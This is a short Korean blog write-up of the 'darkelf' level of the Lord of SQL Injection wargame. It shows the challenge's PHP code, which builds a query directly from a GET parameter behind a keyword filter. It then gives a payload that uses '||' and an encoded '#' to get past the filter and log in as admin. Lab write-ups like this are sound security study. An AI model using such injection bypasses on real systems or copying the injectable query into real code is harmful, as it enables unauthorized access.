WARGAME/Lord of sql injection
LORD OF SQL INJECTION DARKELF 풀이
msh1307
2022. 5. 13. 14:16
소스 코드
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("darkelf");
highlight_file(__FILE__);
?>
|
cs |
풀이
쿼리문의 id는 guest로 고정되어있고, 이번에 or과 and를 필터링한다.
필터링을 우회하기 위해서 ||나 &&를 사용해줄 수 있다.
db에서 반환한 결과에서 id가 admin이면 문제가 풀린다.
?pw=%27||id=%27admin%27%23를 파라미터로 넘겨주면 풀린다.
%23은 url encoding을 통해서 #의 hex값이다. #는 기본적으로 주석처리도 되지만 url에 입력하면 fragment로 처리가 되기 때문에 따로 미리 인코딩을 해줘야 한다.
최종적으로 쿼리문은 select id from prob_darkelf where id='guest' and pw=''||id='admin'#
